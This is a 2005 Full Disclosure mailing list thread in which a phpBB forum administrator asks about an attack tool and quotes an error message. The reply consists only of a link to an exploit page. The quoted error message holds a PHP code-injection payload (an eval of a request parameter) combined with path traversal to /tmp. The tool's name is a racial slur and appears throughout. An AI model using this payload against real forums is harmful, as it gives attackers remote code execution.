Full Disclosure mailing list archives

Re: A phpBB hacker tool called "nigga".

From: "ElviS .de" <elvi52001 () yahoo com>
Date: Thu, 17 Mar 2005 08:05:55 -0800 (PST)

http://www.k-otik.com/exploits/20050314.phpbbexp.cpp.php

Feher Tamas <etomcat () freemail hu> wrote:Hello,

Have you heard of a tool named "nigga" which hacks phpBB
forums? What effects does it have on the compromised system?
is it a serious break-in or just an automated something?

http://url.was.here/forum/viewtopic.php?t=number_was_here
phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));
exit();// 
/../../../../../../../../../../../../../../../../../../../tmp
template config file

Thanks in advance, Sincerely: Tamas Feher.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Current thread:

A phpBB hacker tool called "nigga". Feher Tamas (Mar 17)
- <Possible follow-ups>
- Re: A phpBB hacker tool called "nigga". ElviS .de (Mar 17)